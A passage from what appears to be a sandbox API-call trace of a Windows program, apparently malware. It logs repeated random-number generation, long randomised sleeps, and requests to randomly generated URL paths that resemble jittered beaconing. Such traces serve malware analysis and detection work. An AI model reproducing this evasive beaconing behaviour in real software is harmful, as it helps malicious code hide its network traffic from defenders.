dwContext=0x0) returned 0x0 [0237.607] GetProcessHeap () returned 0x440000 [0237.607] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0237.607] GetProcessHeap () returned 0x440000 [0237.607] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0237.607] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0237.607] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0237.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0237.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0237.608] Sleep (dwMilliseconds=0x1bcd5) [0237.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0237.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0237.801] GetProcessHeap () returned 0x440000 [0237.801] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0237.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0237.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0237.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b266, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a1b266) returned 0x0 [0238.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.056] GetProcessHeap () returned 0x440000 [0238.056] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0238.056] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0238.056] lstrcatA (in: lpString1="\x04", lpString2="/fh7dPbrb9hwrd5Uq1l9l/yko7t1z1aa9xop8ihzx5pf8ptn2xgdhoHy1/" | out: lpString1="\x04/fh7dPbrb9hwrd5Uq1l9l/yko7t1z1aa9xop8ihzx5pf8ptn2xgdhoHy1/") returned="\x04/fh7dPbrb9hwrd5Uq1l9l/yko7t1z1aa9xop8ihzx5pf8ptn2xgdhoHy1/" [0238.056] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0238.056] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/fh7dPbrb9hwrd5Uq1l9l/yko7t1z1aa9xop8ihzx5pf8ptn2xgdhoHy1/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0238.056] GetProcessHeap () returned 0x440000 [0238.056] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0238.056] GetProcessHeap () returned 0x440000 [0238.056] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0238.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0238.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0238.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0238.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0238.057] Sleep (dwMilliseconds=0x150c0) [0238.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0238.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.337] GetProcessHeap () returned 0x440000 [0238.337] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4f80 [0238.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4f81, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d4f81) returned 0x0 [0238.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4fa6, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x4d4fa6) returned 0x0 [0238.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 